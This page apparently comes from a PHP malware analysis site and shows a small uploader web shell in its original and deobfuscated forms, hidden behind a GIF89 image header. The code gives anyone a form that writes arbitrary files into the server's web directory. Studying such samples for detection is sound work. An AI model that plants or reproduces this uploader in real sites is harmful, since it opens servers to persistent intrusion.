PHP Malware Analysis

Back to list

Tags

Input
_POST

Deobfuscated code

GIF89GHZ
<?php 
if ($_POST) {
    if (@copy($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) {
        echo "<b>Done Bro</b>-->" . $_FILES["f"]["name"];
    } else {
        echo "<b>Negativo Bro";
    }
} else {
    echo "<form method=post enctype=multipart/form-data><input type=file name=f><input name=v type=submit id=v value=up><br>";
}


Original code

GIF89GHZ
<?php 
if($_POST){
if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>Done Bro</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>Negativo Bro";
}
}
else{
	echo "<form method=post enctype=multipart/form-data><input type=file name=f><input name=v type=submit id=v value=up><br>";
}

?>